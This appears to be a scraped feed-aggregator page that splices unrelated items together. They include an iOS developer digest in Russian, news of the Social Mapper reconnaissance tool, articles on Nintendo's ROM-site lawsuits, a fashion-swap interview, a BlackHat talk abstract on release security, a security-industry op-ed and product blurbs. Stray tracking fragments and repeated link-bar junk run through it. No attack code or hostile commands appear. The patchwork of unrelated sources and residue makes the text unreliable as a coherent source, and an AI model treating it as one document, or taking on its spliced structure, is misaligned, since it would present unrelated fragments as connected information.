Наконец-то можно получить все cases в enum и не хардкодить это каждый раз.

Swift Tip: Quick Performance Timing
Небольшой сниппет, как замерить скорость выполнения какой-либо операции.

Exploring @dynamicMemberLookup
Долгожданный динамизм добавили даже раньше времени — в Swift 4.2. Вспоминаем что это такое и еще полезный хак, как не выстрелить себе в ногу.

Finding Non-localized Strings
Всего один ключ поможет найти не локализованные строки в приложении.

@autoclosure what, why and when
Никогда не использовал и уже забыл, что такое есть в Swift. Кто-то его использует?

Tools & Libs

Xcode для iPad, почему бы и нет.

MarzipanTool
Хотите попробовать запустить iOS приложение на macOS? Тогда этот репозиторий специально для вас.

xcprojectlint
Был линтер для IB, должен быть и линтер для файлов проекта.

iOSLocalizationEditor
Довольно удобное приложение для редактирования файлов локализации.

Extensible mobile app debugger
Facebook выпустил платформу для дебага мобильных приложений с десктопным приложением и плюшками. Кто уже успел попробовать?

Sift app
Приложение, которое показывает запросы в сеть от всех приложений. В AppStore такое не пустят, так что можно только сбилдить тебе на устройство.

Check if UIImage exists in assets in compile time
Если вы не пользуетесь SwiftGen, R.swift или другим подобным решением, либо все еще пишите на Objective-C, то это может стать полезной находкой. Скрипт проверяет наличие используемых картинок в проекте.

NonEmpty
Библиотека, которая гарантирует на этапе компиляции, что коллекция будет непустая 😱

Bartinter
Если контент приложения налазит на статус бар, по-любому будет ситуация, когда он совпадет с фоном. Чтобы не париться, можно взять библитеку, которая определяет яркость фона и меняет цвет статус бара.

SwiftServerSide-Vapor
Вроде довольно неплохой пример приложения на Swift 4.1 и Vapor 3. На китайском, правда, но если хотите сделать регистрацию, какой-то фид и прочее на Vapor, то можно посмотреть.


← Предыдущий выпуск: iOS дайджест #26


          Social Mapper: A free tool for automated discovery of targets’ social media accounts      Cache   Translate Page   Web Page Cache   

Trustwave has released Social Mapper, an open source tool that automates the process of discovering individuals’ social media accounts. How Social Mapper works The tool takes advantage of facial recognition technology and searches for targets’ accounts on LinkedIn, Facebook, Twitter, Google+, Instagram, VKontakte, Weibo and Douban. It accepts input in several forms: an organisation’s name, searching via LinkedIn; a CSV file with names and URLs to images online; or a folder full of images named … More

The post Social Mapper: A free tool for automated discovery of targets’ social media accounts appeared first on Help Net Security.


          Comment on Free tool checks for critical open source vulnerabilities by ToxicAtomicDog      Cache   Translate Page   Web Page Cache   
This "free" tool requires an email address to send you the link and also requires you to install Java to run the script? Not gonna do it, wouldn't be prudent.
          "You wouldn't download a car!"      Cache   Translate Page   Web Page Cache   
What Does Nintendo's Shutdown Of ROM-Sharing Sites Mean For Video Game Preservation? [Nintendo Life] "The recent news that Nintendo is taking legal action against two sites which illegally distributed ROMs has been met with an overwhelmingly positive response, and rightly so. The individuals sharing these files online care little for the intellectual property rights of the developers who slave away to make the games we get hours of enjoyment out of, and instead leverage the growing interest in retro gaming purely to plaster their sites with garish advertisements for mail-order girlfriends and other dubious businesses. Nintendo – a company traditionally very protective of its IP – has struck a blow which will hopefully have long-term ramifications for the entire industry." • Nintendo Suing Pirate Websites For Millions [Kotaku]
"On July 19, Nintendo filed suit in an Arizona Federal Court against the operator of two popular retro gaming sites, which had been hosting ROMS of some of the company's most famous games. The suit alleges that the two sites, LoveROMS.com and LoveRETRO.co—both owned and operated by Jacob Mathias—are "built almost entirely on the brazen and mass-scale infringement of Nintendo's intellectual property rights." "In addition to Nintendo's video games", the suit says, "Defendants reproduce, distribute, and publicly perform a vast library of Nintendo's other copyrighted works on and through the LoveROMs and LoveRETRO websites, including the proprietary BIOS software for several of Nintendo's video game systems and thousands of Nintendo's copyrighted musical works and audio recordings.""
• Lawsuit threat shuts down ROM downloads on major emulation site [Ars Technica]
"In the wake of Nintendo's recent lawsuits against other ROM distribution sites, major ROM repository EmuParadise has announced it will preemptively cease providing downloadable versions of copyrighted classic games. While EmuParadise doesn't seem to have been hit with any lawsuits yet, site founder MasJ writes in an announcement post that "it's not worth it for us to risk potentially disastrous consequences. I cannot in good conscience risk the futures of our team members who have contributed to the site through the years. We run EmuParadise for the love of retro games and for you to be able to revisit those good times. Unfortunately, it's not possible right now to do so in a way that makes everyone happy and keeps us out of trouble." EmuParadise will continue to operate as a repository for legal downloads of classic console emulators, as well as a database of information on thousands of classic games. "But you won't be able to get your games from here for now," as MasJ writes."
• Emulation isn't a dirty word, and one man thinks it can save gaming's history [Polygon]
""According to the Film Foundation, over half the films made before 1950 are gone," Cifaldi said. "I don't mean that you can't buy these on DVD. I mean they're gone. They don't exist anymore." For films produced before 1920, Cifaldi said, that number jumps to 80 percent. "That terrified me. I wasn't particularly a film buff, but the idea of these works just disappearing forever and never being recoverable scared the crap out of me. So I started wondering is anyone doing this for games. Is anyone making sure that video games aren't doing the same stupid shit that film did to make their heritage disappear? "And yeah, there were people doing this. We didn't call them archivists. We didn't call them digital archeologists or anything. We called them software pirates." It's emulation's long association with piracy, Cifaldi said, that has given it a bad name. Nintendo in particular seems to have a particular aversion towards it, he noted, pointing to their official statement on the issue which has been available at their corporate website for the last 16 years."
• Nintendo vs. Emulation: The difficulty of archiving games [Nintendo Enthusiast]
"Creating and using ROMs/ISOs and emulators is not inherently illegal. The thing is, there's a very thin gray area between the border of legal and illegal in this case. For someone to play classic games completely legally without it being on the original hardware with the original software, they would need to be using an emulator that's running on custom code and doesn't use BIOS files obtained from an external source. As for the games, they would need to be backups created by the user, who would have to create them by dumping the data from their own original copies of said games. Thus, emulation becomes illegal as soon as file-sharing is involved, and the vast majority of folks using emulators is doing so thanks to file-sharing. This is why Nintendo has constantly been trying to take down emulation hubs as it considers them to be centers for piracy promotion."
• Yes, Downloading Nintendo ROMs Is Illegal (Even if You Own the Game) [Tom's Hardware]
"For the most part, emulators in and of themselves do not fall under any copyright infringement, depending on their purpose. And, as mentioned before, it's unlikely a firm will call copyright infringement on a game if no company own the rights to it, or if no one really cares about the game. But what about the games people and companies do care about? It turns out, you're welcome to emulate any game for backup, so long as it's not used for commercial use. Check out what the U.S. Copyright Office has to say about it:
"Under section 117, you or someone you authorize may make a copy of an original computer program if the new copy is being made for archival (i.e., backup) purposes only; you are the legal owner of the copy; and any copy made for archival purposes is either destroyed, or transferred with the original copy, once the original copy is sold, given away, or otherwise transferred."
But selling that backup copy is another story, according to the U.S. Copyright Office:
"If you lawfully own a computer program, you may sell or transfer that lawful copy together with a lawfully made backup copy of the software, but you may not sell the backup copy alone. ... In addition to being a violation of the exclusive right of distribution, such activity is also likely to be a violation of the terms of the license to the software. ... You should be wary of sites that offer to sell you a backup copy. And if you do buy an illegal backup copy, you will be engaging in copyright infringement if you load that illegal copy onto your computer ...""
• The retro gaming industry could be killing video game preservation [Eurogamer]
"The convoluted nature of the video game emulation sector means that emulators rarely stand still for long; like any other program they are iterated upon, improved, modified for different tasks and generally tinkered with endlessly, creating development forks which branch off in multiple directions. It transpired that the fork of Snes9x used in the Retron 5 could be directly attributed to De Matteis himself. "Snes9x Next/2010 was a speedhack-focused fork that I personally developed, open sourced and published on Github," he says. "I had to perform heavy alterations to this core to get it to run acceptably well on old hardware. It is likely they used the software for this exact reason; that the others were not up to par performance-wise and it offered a good balance between performance and compatibility. Needless to say, I was never consulted beforehand; software was simply taken and sold in spite of its license that expressly forbids this." In Hyperkin's defense, it's not like the company simply downloaded the code from the web and installed it on the Retron 5; like many firms of this type, it didn't develop the software in-house but instead purchased it from an external contractor. De Matteis knows who this individual is - and has informed Hyperkin that he is aware of their identity - but doesn't wish to name them here. Nonetheless, this contractor has profited off the hard work of the RetroArch team."

          Reddit: [Discussion] If you could chose one closed source software to be open source, what software do you choose?      Cache   Translate Page   Web Page Cache   

You can divide your answer into 2 parts:

First is software you want to be open source, and the second is the software that will be most beneficial for the general public, in case they aren't the same.

submitted by /u/Gift_Me_Linux_Games
[link] [comments]
          LXer: Strawberry: Quality sound, open source music player      Cache   Translate Page   Web Page Cache   
I recently received an email from Jonas Kvinge who forked the Clementine open source music player. Jonas writes:read more
          Getting started with Postfix, an open source mail transfer agent      Cache   Translate Page   Web Page Cache   
Postfix is a great program that routes and delivers email to accounts that are external to the system. It is currently used by approximately 33% of internet mail servers . In this article, I'll explai ... - Source: opensource.com
          Comment on Open Source Meetup Presentation @ FOSDEM 2010 ! by SEO Proxy      Cache   Translate Page   Web Page Cache   
<strong>SEO Proxy</strong> I found a great...
          Social Mapper – Correlate social media profiles with facial recognition      Cache   Translate Page   Web Page Cache   

Trustwave developed Social Mapper an Open Source Tool that uses facial recognition to correlate social media profiles across different social networks. Security experts at Trustwave have released Social Mapper, a new open-source tool that allows finding a person of interest across social media platform using facial recognition technology. The tool was developed to gather intelligence from […]

The post Social Mapper – Correlate social media profiles with facial recognition appeared first on Security Affairs.


          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Free tool checks for critical open source vulnerabilities      Cache   Translate Page   Web Page Cache   
Every month details emerge of dozens of new security vulnerabilities, and open source software is not immune from these. In order to help companies stay up to date and ensure vulnerabilities are patched quickly, open source security specialist WhiteSource is launching a free tool that provides companies with immediate, real-time alerts on the 50 most critical vulnerabilities published in the open source community. The standalone CLI tool is free to use and available for anyone to download as a desktop application. Once downloaded, the Vulnerability Checker offers users the opportunity to import and scan any library and run a quick check… [Continue Reading]

          Leonardo da Vinci to do list - c.a 1490      Cache   Translate Page   Web Page Cache   
https://www.aneddoticamagazine.com/wp-content/uploads/davincilist.jpg

NPR’s Robert Krulwich had it directly translated. And while all of the list might not be immediately clear, remember that Da Vinci never intended for it to be read by web surfers 500  years in the future.


[Calculate] the measurement of Milan and Suburbs


[Find] a book that treats of Milan and its churches, which is to be had at the stationer’s on the way to Cordusio


[Discover] the measurement of Corte Vecchio (the courtyard in the duke’s palace).


[Discover] the measurement of the castello (the duke’s palace itself)


Get the master of arithmetic to show you how to square a triangle.


Get Messer Fazio (a professor of medicine and law in Pavia) to show you about proportion.


Get the Brera Friar (at the Benedictine Monastery to Milan) to show you De Ponderibus (a medieval text on mechanics)


[Talk to] Giannino, the Bombardier, re. the means by which the tower of Ferrara is walled without loopholes (no one really knows what Da Vinci meant by this)


Ask Benedetto Potinari (A Florentine Merchant) by what means they go on ice in Flanders


Draw Milan


Ask Maestro Antonio how mortars are positioned on bastions by day or night.


[Examine] the Crossbow of Mastro Giannetto


Find a master of hydraulics and get him to tell you how to repair a lock, canal and mill in the Lombard manner


[Ask about] the measurement of the sun promised me by Maestro Giovanni Francese


Try to get Vitolone (the medieval author of a text on optics), which is in the Library at Pavia, which deals with the mathematic.


From Open Culture


Related Post














Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/leonardo-da-vinci-to-do-list-c-a-1490/
          Global Fashion Exchange: “If people are smiling, the world is going to shift”      Cache   Translate Page   Web Page Cache   
#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

INTERVIEW On average, we wear our clothes a total of seven times and then, many simply get thrown away - 2.5 billion pounds of clothing each year to be precise. Scary but easy to change as one of the simplest and most sustainable ways to let garments live longer is to find them a new owner. And this is the mission of the Global Fashion Exchange (GFX): To promote sustainable consumption patterns, such as reusing and recycling, around the globe through inspiring forums, educational content and cultural events like clothing swaps. Since its inception in 2013, GFX has saved 22 tons of clothes from going to landfills. FashionUnited thought that was pretty impressive and spoke to GFX co-founder Patrick Duffy to find out more.

Patrick, could you talk a little bit about the beginning of the Global Fashion Exchange?

Sure. A long time ago, I worked in nightlife as a promoter, also at production companies for big fashion brands. I honed my skills and then I became a restaurateur. I kind of got an all around experience in entertaining. As that was happening, I became more and more familiar with sustainability. Then I went to the Copenhagen Fashion Week as a journalist, writing for various publications. They had a sustainability area there and back then, I didn’t know much about it. But then Rana Plaza happened and it shifted my perspective on the fashion industry. Everything had to do with overconsumption. It made me sick and I had what I call my Oprah aha-moment. I was thinking about how to reframe everything. Then I was invited back to Copenhagen and there, they had a an initial clothing swap in 2013 and I thought ‘this is something I can take all my skills into and turn it into a message’. And this was at a time when sustainability was still the s-word that nobody wanted to say. Sustainability still needed a lot of support.

Was your idea well received?

[laughs] Not initially. When I told people in the industry of the idea, they said what people often say to a really good idea ‘You are so crazy’. That’s what people said, but that was so not true. But then I realised the people I was talking to were from fashion brands whose main goal was to sell clothes. But we’ve reached capacity when it comes to clothing production, we’re maxed out. I kept presenting my idea and I heard other comments, people saying ‘This is incredible but we don’t know how to do it’. Suddenly, everyone was super excited and supportive and helped me keep pushing the idea. In my personal life, I gave everything away, all my material possessions and even New York City was so expensive to live in. I left it all and really focused on turning it into something that would make me really happy to work on.

Do you charge for the events?

The larger events are completely free because we do not want to exclude anyone because sustainability is a non-exclusionary topic. We just had a massive outdoor event at a venue in New York City at The Brooklyn Mirage, a huge outdoor venue in East Williamsburg. They were fantastic - they promoted the event and supported it by giving the venue for free. We had superstar DJs, many people helping with setting up and 20 ethical and sustainable brands showcasing their wares. They got the space for free because they needed a chance to get their message aout nd I felt it wouldn’t have been right to charge them money to do so. In addition, we had a fashion show with 120 models of all different colours and sizes, some were wheelchair-bound. All worked for free so that the event could be free so that there is no reason why anyone should not be participating - charging a cover of 10 or 20 dollars ticket fee can be a deal breaker for some.

What about the smaller swaps?

The smaller events allow the organisers to cover their costs. And that’s something people always ask, ‘How do you make money?’ For the smaller swaps, we work with the ambassadors to offset their costs and determine how much of a ticket price can we put in the local communities. After all, they are putting time in; they deserve to be paid.

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Are people biased against clothes from people they don’t know?

No, not at the swaps because don’t forget, people come voluntarily. And the big swaps are well frequented. They become glamorous events and people get interested. Interest is the hook to bring them into the loop and to educate them on the topic and on sustainability goals like human rights, sustainability, etc. And once they understand a bit more about it, then people will hopefully go beyond the swap.

Would you say the swaps have a mind-changing effect?

Yes, if not a life-changing definitely a mind-changing effect. For example at the recent event in New York with 1,600 people, I was standing at the entrance and talking to each person attending, asking them ‘Do you know what you’re here for?’ Many did know; many did not know; they had just come to swap clothes. So it is a touchpoint to communicate the startling facts - and then the aha-moment happens, the transformational moment. Once people understand the problem - the fashion industry being the most polluting industry and consumers contributing to that - they can’t erase that.

People may not change their lifestyle but they have received the information, and most of the times, people want to get involved. They become activists in their own way, they share through social media and proudly show their swapped items. That’s a positive development.

When targeting people, especially millennials, it is important to psychologically understand how their mind works. And I know what people want; they want the experience. And the experience they have reflects back on the topic and the message, which is sustainability. That’s why it is easier to communicate through a positive experience; if people are smiling, the world is going to shift.

Could you explain how GFX Local came about?

GFX Local came up as a solution to address the fact that we want to spread the word about what we’re doing and to promote more clothing swaps. We noticed after organising the larger swaps that they require a lot of funding and manpower. However, it was always my dream to basically take this education all over the world but it wasn’t going as quickly as I wanted because it was depending on sponsorship; money basically. ‘Money is a silly reason for this not to be spread,’ I thought and GFX Local was born, inspired by Fashion Revolution. We developed a tool kit for those interested to download and apply. Then, we go through a kind of question and answer process to find out if someone is qualified and they sign up to become GFX ambassadors. Or, they can download the kit and do it in their hometown and start a clothing swap.

Are there any country-specific biases? In India for example, second hand is not big at all.

Of course, in all markets, GFX considers what goes on culturally and socioeconomically before starting a swap. Bolivia, Costa Rica, Barcelona, etc. all different and in some, like India for example, second-hand clothing is not desirable. But GFX is fun and the experience really key; a tool to show people that this is great. The quality of the clothing is just as key as well as the marketing and branding.

When doing a swap for the first time, storytelling is important and we do a lot of coaching for the ambassadors to bring influential people to the table. In India, this was Evelyn Sharma, a famous Bollywood actress who also has her own organisation, Seams for Dreams. The organisation provides appropriate clothing to the less privileged members of society in India and raises funds and awareness through fashion events. It really helps when GFX is endorsed by someone else. Evelyn was not just a face but doing something similar, which is related to the cause. This is important not only in India but all over the world. In India, we received such a positive response and great publicity that the local ambassador is creating more events.

What is your personal take-away from starting the Global Fashion Exchange?

Oh, I have learned so much and I have had wonderful teachers at the different organisations I have worked with. Over time, I also got invited to talk at conferences and I have spoken at the United Nations four times about GFX. I was also at the Omina Fashion Summit and I gave the keynote address at the first Australian Circular Fashion Conference. People see me and they see that I’m just a normal person and that one person can change the world. Plus, people want to hear positive things, they don’t want to hear about the crazy problems that are happening. So there is no need to be banging on about the problems but to talk about the solutions. GFX becomes a solution or provides different solutions.

Tell us a bit about GFX Consulting.

GFX Consulting is part of business model that developed out of my thought ‘how am I going to make this work? What am I going to do with tall this knowledge?’ I wanted to keep it open source right from the beginning. And now I am teaching companies how to transform a supply chain and how to communicate it. This could be doing a big project with a major brand but also with small ones and exploring how to find funding, getting connected to different markets and communicating their story. Assessing different needs and building custom solutions basically.

There is a lot of storytelling in marketing and brands are just starting to understand that telling the story of sustainability can be a big part of what they do. The people, the planet, the process. But often, brands are stuck in linear models or cycles whereas circularity is important and we can teach them how to transition.

In view of the recent scandal with brands destroying perfectly good stock, how do you sell circularity and sustainability to brands?

The biggest question is: Why are they burning all of this? That’s where you have to teach people if you buy less, brands need to produce less. Because currently, what brands are doing, they are polluting the earth. So they have to innovate and take a look at what they’re doing. They have to focus on better quality but also circularity, creating products that are 100 percent circular. Brands have to become educators as well. They have to take responsibility alongside the consumer. Slowing down the production as fast fashion is choking the industry. Innovative materials are key, for example those made out of ocean plastics. Luckily, sustainability is a trend and hopefully one that is going to last.

Photos: Global Fashion Exchange


          Clients - Coimbatore, Madras, India      Cache   Translate Page   Web Page Cache   
Coimbatore, India At ThoughtWorks, testing (especially test automation and Agile testing) is central to our delivery methodology. ThoughtWorks has contributed significantly to Open Source testing tools, such as Sahi, Selenium and SharpRobo and we are at the forefront of automated testing practices. Our testing capability is amongst the most advanced in ..
          LXer: Strawberry: Quality sound, open source music player      Cache   Translate Page   Web Page Cache   
Published at LXer: I recently received an email from Jonas Kvinge*who*forked the Clementine open source music player. Jonas writes:read more Read More......
          Google Boots Open Source Anti-Censorship Tool From Chrome Store      Cache   Translate Page   Web Page Cache   

A browser extension that acted as an anti-censorship tool for 185,000 people has been kicked out of the Chrome store by Google. The open source Ahoy! tool facilitated access to more than 1,700 blocked sites but is now under threat. Despite several requests, Google has provided no reason for its decision.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.


          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          LulzBot Mini 2      Cache   Translate Page   Web Page Cache   

SMALL SIZE, BIG CAPABILITIES

Major hardware improvements over the original LulzBot Mini include Einsy RAMBo electronics with Trinamic drivers for whisper-quiet operation and a build volume increase of approximately 20% with no increase in footprint.


BUT WAIT, THERE’S MORE

The Mini 2 features a belt-driven Z-axis which allows for rapid travel and accurate layer alignment, with no reduction in minimum resolution. Also included as standard equipment are three accessories previously offered as add-ons to the original LulzBot Mini: A next generation Tool Head designed around the E3D Titan Aero hot end and extruder, capable of printing both rigid and flexible filaments out of the box, the LulzBot modular bed system with reversible heated glass/PEI surface, and a Graphical LCD Controller for tetherless operation.


LIBRE INNOVATION

All LulzBot products use Free Software and are Open Source Hardware. This means your LulzBot Mini uses proven technology developed collaboratively. Cura LulzBot Edition version 3.2 software is now in a public beta phase, and is anticipated for a final release in advance of the first shipments of Mini 2 units. The update to Cura LE features faster load times, an updated interface, and a bevy of new slicing options.


DON'T FORGET TO BUY FILAMENT!

The LulzBot Mini does not ship with filament, so make sure to order some with your purchase. We recommend PLA for beginners, but more advanced materials including heavy-duty options like nylon, PETG, and a variety of composites are available with preset profiles. With so many options, the choice is yours!


          Ultimaker Original+       Cache   Translate Page   Web Page Cache   

Build knowledge while building your printer

DIY-kit allows the user to gain more understanding of how the printer functions, building the knowledge needed for any future upgrades or replacements before the first print has even been completed.


Not your average kit

Even though assembly is required, you can still expect the same phenomenal quality and speed as the assembled Ultimaker 2. Industry leading specifications like layer resolutions as fine as 20 microns and extrusion speeds up to 300mm/s yield high-quality prints.


Hot off the bed

The Original+ now includes a heated bed for smoother bottom layers, better adhesion, and ABS printing. Other included improvements are the UltiController user interface system, enhanced electronics for better temperature control, and a redesigned fan cap and feeder wheel for added safety.


Affordable and reliable

Replacement parts are available at a low cost. The reliable Original+ is low maintenance, and parts are easily interchangeable.


Tinker, share, and enhance

Open source files are available in the Ultimaker knowledge base. This encourages users to experiment, share ideas and knowledge, and work together to continue pushing the limits of what is possible.



          Racial Equity Toolkits–A Local Example      Cache   Translate Page   Web Page Cache   

Last year our School of Social Work class, a service learning course with the Community Empowerment Fund, learned how to use a racial equity toolkit to assess 5 local community policies or programs and hopefully produce an analysis that was informative and useful to our elected officials. The topics were presented by the 4 local elected officials who were serving on the Leadership Team for the Orange County Partnership to End Homelessness: Kathleen Ferguson from the Hillsborough Board of Commissioners, Sally Greene from the Chapel Hill Town Council, Mark Marcoplos from the Board of County Commissioners, and Damon Seils from the Carrboro Board of Aldermen. They each suggested a policy or program in their jurisdictions that they felt could use analysis with a racial equity lens. Topics included Hillsborough’s clean energy resolution, Chapel Hill’s purchase of the American Legion property, redevelopment of the former Chapel Hill Town Hall, short range transit planning, and programming for Department of Social Services clients. We used a toolkit developed by the Seattle Office of Civil Rights and the Government Alliance on Race and Equity (GARE). The folks with GARE wanted to share our experience on their Race to Democracy website, “an open source campaign to build a more inclusive democracy that advances racial equity.” We worked with them to create a blog post on the analysis of the American Legion property. 

You can read the post here

The full report is available here.

And stay tuned, we’ll be doing another set of racial equity analyses for our community in our course this fall!


                Cache   Translate Page   Web Page Cache   
Google Boots Open Source Anti-Censorship Tool From Chrome Store.
          JAVA EN OPEN SOURCE ONTWIKKELAAR HASSELT - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:02 GMT - Toon alle vacatures in Kontich
          JAVA EN OPEN SOURCE ONTWIKKELAAR KONTICH (Antwerpen) - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:03 GMT - Toon alle vacatures in Kontich
          JAVA EN OPEN SOURCE ONTWIKKELAAR MERELBEKE (GENT) - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:03 GMT - Toon alle vacatures in Kontich
          VIDEO: Chief Obi – Kweku      Cache   Translate Page   Web Page Cache   
About UsWelcome to Jaguda (JaH-GooD’-AH), your global open source medium that utilizes credible sources to keep you informed. Utilizing innovative technology, visual documentaries, and blogging
          VIDEO: Chief Obi – Kweku      Cache   Translate Page   Web Page Cache   
About UsWelcome to Jaguda (JaH-GooD’-AH), your global open source medium that utilizes credible sources to keep you informed. Utilizing innovative technology, visual documentaries, and blogging
          Ayo Jay – Let Him Go      Cache   Translate Page   Web Page Cache   
About UsWelcome to Jaguda (JaH-GooD’-AH), your global open source medium that utilizes credible sources to keep you informed. Utilizing innovative technology, visual documentaries, and blogging
          Ayo Jay – Let Him Go      Cache   Translate Page   Web Page Cache   
About UsWelcome to Jaguda (JaH-GooD’-AH), your global open source medium that utilizes credible sources to keep you informed. Utilizing innovative technology, visual documentaries, and blogging
          BlackHat USA 2018 | 次日议题精彩解读      Cache   Translate Page   Web Page Cache   

BlackHat USA 2018 | 次日议题精彩解读

Black Hat官网地址: https://www.blackhat.com/

会议介绍

BlackHat作为全球信息安全行业的最高盛会,有着悠久历史,今年已经进入了第21个年头,每次会议的议题筛选都极为严格。众多议题提交后通过率不足20%,所以Black Hat也被称为最具技术性的信息安全会议。

安全客在本届BlackHat会议上,邀请了众多参会的安全大牛,在大会现场同步和大家分享看到的精彩议题。

时间:2018年8月8日-9日 议题速递――次日上半场 Stop that Release, There’s a Vulnerability!

演讲人:Christine Gadsby|Director, Product Security Operations, BlackBerry

演讲时间:9:00-9:25

主题标签:Security Development Lifecycle,Enterprise

Software companies can have hundreds of software products in-market at any one time, all requiring support and security fixes with tight release timelines or no releases planned at all. At the same time, the velocity of open source vulnerabilities that rapidly become public or vulnerabilities found within internally written code can challenge the best intentions of any SDLC.

How do you prioritize publicly known vulnerabilities against internally found vulnerabilities? When do you hold a release to update that library for a critical vulnerability fix when it’s already slipped? How do you track unresolved vulnerabilities that are considered security debt? You ARE reviewing the security posture of your software releases, right?

As a software developer, product owner, or business leader being able to prioritize software security fixes against revenue-generating features and customer expectations is a critical function of any development team. Dealing with the reality of increased security fix pressure and expectations of immediate security fixes on tight timelines are becoming the norm.

This presentation looks at the real world process of the BlackBerry Product Security team. In partnership with product owners, developers, and senior leaders, they’ve spent many years developing and refining a software defect tracking system and a risk-based release evaluation process that provides an effective software ‘security gate.’ Working with readily available tools and longer-term solutions including automation, we will provide solutions attendees can take away and implement immediately.

Tips on how to document, prioritize, tag, and track security vulnerabilities, their fixes, and how to prioritize them into release targets

Features of common tools [JIRA, Bugzilla, and Excel] you may not know of and examples of simple automation you can use to verify ticket resolution.

A guide to building a release review process, when to escalate to gate a release, who to inform, and how to communicate.


BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读
BlackHat USA 2018 | 次日议题精彩解读

          Oh, No, Not Another Security Product      Cache   Translate Page   Web Page Cache   

Let's face it: There are too many proprietary software options. Addressing the problem will require a radical shift in focus.

Organizations and businesses of all types have poured money into cybersecurity following high-profile breaches in recent years. The cybercrime industry could be worth $6 trillion by 2022, according to some estimates , and investors think that there's money to be made. But like generals fighting their last battle, many investors are funding increasingly complex point solutions while buyers cry out for greater simplicity and flexibility.

Addressing this problem requires a radical shift in focus rather than a change of course. Vendors and investors need to look beyond money and consider the needs of end users.

More Money, More Problems

London's recent Infosecurity conference included more than 400 vendors exhibiting, while RSA in San Francisco boasted more than 600. And this only includes those with the marketing budgets and inclination to exhibit. One advisory firm claims to track 2,500 security startups , double the number of just a few years ago. Cheap money has created a raft of companies with little chance of IPO or acquisition, along with an even greater number of headaches for CISOs trying to make sense of everything.

The market is creaking from this trend, with Reuters reporting mergers and acquisitions down 30% in 2017, even as venture capital investment increased by 14%. But the real pain is being felt by CISOs trying to integrate upward of 80 security solutions in their cyber defenses, as well as overworked analysts struggling to keep up. The influx of cash also has caused marketing budgets to spike, leading to a market in which it is deemed acceptable for increasingly esoteric products to be promoted to CISOs as curing everything.

All of this feeds into a sense of "product fatigue" where buyers are frightened into paying for the latest black box solution, only to see their blood pressure spike when they find that they don't have the necessary resources to deploy or support these tools. This situation does not benefit any of the parties ― the overwhelmed CISO, the overly optimistic investors, or the increasingly desperate vendors caught in limbo between funding rounds when their concepts weren't fully baked to begin with.

Addressing complex modern threats calls for sophisticated tools and products, but we cannot fight complexity with complexity. Security operations center teams cannot dedicate finite analyst capacity to an ever-expanding battery of tools. Fragmentation within the security suite weakens company defenses and the industry as a whole, and the drain on analysts' time detracts from crucial areas such as basic resilience and security hygiene.

Platforms, Not Products

The industry doesn't need more products, companies, or marketing hype. We need an overhaul of the whole approach to security solutions, not an improvement of components. Security should be built on platforms with a plug-and-play infrastructure that better supports buyers, connecting products in a way that isn't currently possible.

Such platforms should be flexible and adaptable, rewarding vendor interoperability while punishing niche solutions that cannot be easily adopted. This would lead to collaboration within the industry and create a focus on results for end users, rather than increasingly blinkered product road maps. Such platforms could act as a magnifying glass for innovation, providing a sandbox to benchmark new technologies and creating de facto security standards in the process.

This move from proprietary architecture to open modular architecture is a hallmark of Clayton Christensen's disruptive innovation theory, and it is long overdue within the security industry. Buyers will have greater control of their tech stacks, while vendors and investors will get to proof-of-concept faster, and see greater efficiency within the market.

One example of such a platform is Apache Metron, an open source security platform that emerged from Cisco. Metron has been adopted by a number of major security providers and provides a glimpse of what the future of security should look like.

Collaborating, creating industry standards, or making technologies open source does not mean that vendors can't make money; in fact, the reverse is true. Customers will be more willing to invest in security solutions that they know are future-proofed, that don't come with the dreaded "vendor lock-in," and that simplify rather than further complicate their architecture.

Like all of security, there are varying degrees of risk and reward, but this approach is starting to look like the only logical future in an increasingly frothy, confusing, and low return-on-investment field. There will be a correction in the security market, whether it is in a month or a year. The fundamentals that will cause this are already evident, so there is an excellent opportunity to learn the lessons in advance and minimize the pain by contributing toward the platforms of the future.

Related Content: 10 Open Source Security Tools You Should Know Secure Code: You Are the Solution to Open Source's Biggest Problem The Good News about Cross-Domain Identity Management
Oh, No, Not Another Security Product

Learn from the industry's most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Click for more info .

Paul Stokes has spent the last decade launching, growing, and successfully exiting security and analytics technology companies. He was the co-founder and CEO of Cognevo, a market-leading security analytics software business that was acquired by Telstra Corporation. Prior to ...View Full Bio


          Supercopier 1.4.1.0      Cache   Translate Page   Web Page Cache   
Supercopier is a file management tool that allows you to quickly and easily move, transfer or copy files. It was designed as a replacement for the standard Windows file copy dialogs and allows you to make large transfers at once with many options. [License: Open Source | Requires: Win 10 / 8 / 7 / Vista / XP | Size: 6.42 MB+ ]
